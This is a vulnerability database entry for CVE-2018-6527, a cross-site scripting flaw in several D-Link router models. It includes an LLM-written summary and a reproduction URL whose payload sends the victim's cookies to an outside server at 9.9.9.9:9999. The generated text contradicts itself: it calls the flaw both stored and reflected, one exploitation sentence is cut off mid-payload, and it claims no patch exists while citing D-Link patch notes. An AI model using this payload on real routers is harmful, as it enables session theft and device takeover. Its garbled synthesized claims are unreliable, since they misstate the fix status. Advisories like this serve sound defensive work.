CVE-2018-6527
Description
XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in D-Link DIR-868L, DIR-865L, and DIR-860L routers allows remote attackers to steal authentication cookies via a crafted deviceid parameter in adv_parent_ctrl_map.php.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in the file htdocs/webinc/js/adv_parent_ctrl_map.php of D-Link DIR-868L (firmware DIR868LA1_FW112b04 and previous), DIR-865L (firmware patch 1.08.B01 and previous), and DIR-860L (firmware DIR860LA1_FW110b04 and previous) routers [1]. The deviceid GET parameter is reflected in the page without proper sanitization, allowing injection of arbitrary HTML and JavaScript [1]. The vulnerability is reachable from both WAN and LAN interfaces [1].
Exploitation
An attacker can craft a malicious URL containing a deviceid parameter with embedded JavaScript, such as " to execute arbitrary code in the victim's browser [1]. The attacker must lure an authenticated user (e.g., via phishing or a crafted link) to visit the vulnerable page [1]. The XSS payload executes in the context of the router's web interface, allowing the attacker to access the victim's session cookies [1].
Impact
Successful exploitation allows an attacker to steal authentication cookies from an authenticated user's session [1]. With these cookies, the attacker can impersonate the user and gain administrative access to the router's web interface, potentially leading to full device compromise, including configuration changes, information disclosure, or further network attacks [1].
Mitigation
D-Link has not released a public patch for these models (DIR-868L, DIR-865L, DIR-860L) as of the publication date [1]. Users should restrict access to the router's web interface from the WAN side and use strong, unique passwords. The affected devices may be nearing or at end-of-life; upgrading to a supported model is recommended [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization of the `deviceid` GET parameter in `adv_parent_ctrl_map.php` allows reflected XSS."
Attack vector
An unauthenticated attacker on the LAN or WAN can craft a URL containing a malicious `deviceid` parameter and lure an authenticated victim to open it. The unsanitized parameter is injected into a JavaScript context inside `adv_parent_ctrl_map.php`, allowing the attacker to break out of the string and execute arbitrary JavaScript. This XSS can be used to steal the victim's authentication cookies, giving the attacker control over the router's web interface [ref_id=1].
Affected code
The vulnerability resides in `/htdocs/webinc/js/adv_parent_ctrl_map.php`. The PHP file directly echoes the `deviceid` GET parameter into a JavaScript string without any sanitization or encoding [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] does not provide a specific fix, but the root cause is the lack of input validation and output encoding. The remediation would require properly escaping or sanitizing the `deviceid` parameter before embedding it in the JavaScript response, such as using `htmlspecialchars()` or a similar encoding function to neutralize any HTML/JavaScript metacharacters.
Preconditions
- authThe victim must be authenticated to the router's web interface.
- networkThe attacker must be able to reach the router's web interface over the network (LAN or WAN).
- inputThe attacker must craft a URL with a malicious deviceid parameter and trick the victim into opening it.
Reproduction
As an authenticated user, visit the following URL in a browser that has access to the router: `http://192.168.0.1/adv_parent_ctrl_map.php?deviceid=whatever\');window.open(\'http://9.9.9.9:9999/cookie.asp?msg=\'+document.cookie`. The JavaScript code will execute and send the victim's cookies to the attacker-controlled server at 9.9.9.9:9999 [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdfmitrex_refsource_CONFIRM
- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdfmitrex_refsource_CONFIRM
- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdfmitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.